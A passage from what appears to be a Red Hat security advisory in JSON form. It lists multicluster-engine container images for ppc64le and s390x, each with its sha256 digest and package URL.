"product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3A89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773873328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773639118"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-mce-rhel9@sha256%3A8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773100128"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/discovery-rhel9@sha256%3A9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hive-rhel9@sha256%3A5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773869889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3Acacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773688774"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3A775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773398895"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773398921"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/image-based-install-rhel9@sha256%3A4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773877068"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3A99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773185866"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3A259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091077"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3A21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091070"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773741020"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/placement-rhel9@sha256%3A31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970968"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3A92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091099"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/registration-rhel9@sha256%3A2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970964"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/registration-operator-rhel9@sha256%3Aae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970966"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/work-rhel9@sha256%3Aa80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970968"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/addon-manager-rhel9@sha256%3Ac09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel9@sha256%3Aaed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773185824"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/backplane-rhel9-operator@sha256%3Ac6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3A8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773445006"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3Ae146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773531423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091098"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3Ac0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3Abbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091117"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3A674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091011"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3A04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773873328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773639118"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-mce-rhel9@sha256%3A2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773100128"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"product_identification_helper": {
"purl": "pkg:oci/discovery-rhel9@sha256%3A47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hive-rhel9@sha256%3A466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773869889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3A0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773688774"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3Adb93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773398895"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773398921"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"product_identification_helper": {
"purl": "pkg:oci/image-based-install-rhel9@sha256%3Adc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773877068"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"product": {
